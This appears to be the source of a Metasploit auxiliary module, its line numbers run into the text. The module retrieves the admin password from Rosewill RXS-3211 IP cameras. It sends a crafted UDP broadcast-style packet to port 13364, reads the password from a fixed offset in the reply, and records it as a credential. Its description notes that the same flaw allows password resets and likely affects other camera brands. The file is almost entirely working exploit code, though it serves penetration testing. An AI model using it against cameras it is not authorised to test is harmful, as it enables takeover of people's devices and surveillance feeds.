Path: blob/master/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def initialize11super(12'Name' => 'Rosewill RXS-3211 IP Camera Password Retriever',13'Description' => %q{14This module takes advantage of a protocol design issue with the Rosewill admin15executable in order to retrieve passwords, allowing remote attackers to take16administrative control over the device. Other similar IP Cameras such as Edimax,17Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.18The protocol design issue also allows attackers to reset passwords on the device.19},20'Author' => 'Ben Schmidt',21'License' => MSF_LICENSE22)2324register_options(25[26Opt::CHOST,27Opt::RPORT(13364),28]29)30end3132def run_host(ip)33# Protocol34target_mac = "\xff\xff\xff\xff\xff\xff"35cmd = "\x00" # Request36cmd << "\x06\xff\xf9" # Type3738password = nil3940begin41udp_sock = Rex::Socket::Udp.create({42'LocalHost' => datastore['CHOST'] || nil,43'PeerHost' => ip,44'PeerPort' => datastore['RPORT'],45'Context' =>46{47'Msf' => framework,48'MsfExploit' => self49}50})5152udp_sock.put(target_mac + cmd)5354res = udp_sock.recvfrom(65535, 0.5) and res[1]5556# Parse the reply if we get a response57if res58password = parse_reply(res)59end60rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError61print_error("Connection error")62rescue ::Interrupt63raise $!64rescue ::Exception => e65print_error("Unknown error: #{e.class} #{e}")66ensure67udp_sock.close if udp_sock68end6970# Store the password if the parser returns something71if password72print_good("Password retrieved: #{password.to_s}")73report_cred(74ip: rhost,75port: rport,76service_name: 'ipcam',77user: '',78password: password,79proof: password80)81end82end8384def report_cred(opts)85service_data = {86address: opts[:ip],87port: opts[:port],88service_name: opts[:service_name],89protocol: 'tcp',90workspace_id: myworkspace_id91}9293credential_data = {94origin_type: :service,95module_fullname: fullname,96username: opts[:user],97private_data: opts[:password],98private_type: :password99}.merge(service_data)100101login_data = {102core: create_credential(credential_data),103status: Metasploit::Model::Login::Status::UNTRIED,104proof: opts[:proof]105}.merge(service_data)106107create_credential_login(login_data)108end109110def parse_reply(pkt)111@results ||= {}112113# Ignore "empty" packets114return nil if not pkt[1]115116if (pkt[1] =~ /^::ffff:/)117pkt[1] = pkt[1].sub(/^::ffff:/, '')118end119120return pkt[0][333, 12] if pkt[0][6, 4] == "\x01\x06\xff\xf9"121end122end123124125